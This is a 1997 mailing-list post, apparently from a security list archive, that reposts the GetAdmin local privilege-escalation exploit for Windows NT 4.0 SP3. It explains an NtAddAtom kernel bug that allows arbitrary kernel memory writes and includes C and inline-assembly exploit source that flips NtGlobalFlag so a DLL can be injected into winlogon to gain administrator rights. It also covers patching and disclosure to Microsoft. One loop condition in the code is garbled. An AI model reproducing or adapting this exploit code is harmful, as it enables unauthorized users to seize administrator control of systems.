GetAdmin NT exploit

Christopher Klaus (cklaus@ISS.NET)
Tue, 08 Jul 1997 11:19:00 -0400

Windows NT 4.0 Exploit: Allows intruders to become administrators on
machine.

Works on Windows 4.0 with Service Pack 3 installed.

Web: http://cmp.phys.msu.su/ntclub/pub/code.htm

GetAdmin source code.

Here's my program GetAdmin.

This program can get administrator rights without any special
privileges. Simly run GetAdmin or GetAdmin account_name from command line.
If you not enter
account_name current account will be used.

How it works?

Here's string that done all in getadmin:
ChangeNtGlobalFlag(GetNtGlobalFlagPtr()); After that you can open any
process in system, becose function NtOpenProcess
not checks for SE_DEBUG_PRIVILEGE if bit in NtGlobalFlag+2 is set.After it
, program injects dll in winlogon process. Winlogon have SYSTEM account so
it can
add / remove user in administrator group.

Function ChangeNtGlobalFlag :

BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag)
{
DWORD callnumber = 0x3; //NtAddAtom
DWORD stack[32] ;
int i;
DWORD handle=0;
CHAR string[255];

if(!pNtGlobalFlag) return 0;

stack[0] = (DWORD)string;
stack[1] = (DWORD)&handle; //pNtGlobalFlag;

for(i=0;i ? 0x100;i++)
{
sprintf(string,"NT now cracking... pass %d",i);

if(handle & 0xf00){
stack[1] = (DWORD)pNtGlobalFlag+1;
}

__asm{
mov eax, callnumber;
mov edx, stack;
lea edx,dword ptr [stack];
int 0x2e;
}

if( stack[1] == pNtGlobalFlag+1) break;
}

return TRUE;
}

Bug is that subfunction in NtAddAtom not checks address of output . So
possible to write in any space of kernel memory. Of curse it not necessary
inject dll to
winlogon, to get admin rights you can simply patch same place of ntoskernel
, or replace process token and e.t.c.If you have get full source code
please click here.

Preventing the Attack:

Only one really way : patch ntoskernel and replace function NtAddAtom
so it checks for valid address.
You can remove all access from ntoskernel but it possible to enter
fixed address of NtGlobalFlag in getadmin. And exist other ways to get
administrator rights if you
can write to kernel memory.

I informed Microsoft about this 30 Jun 97.

Konstantin Sobolev.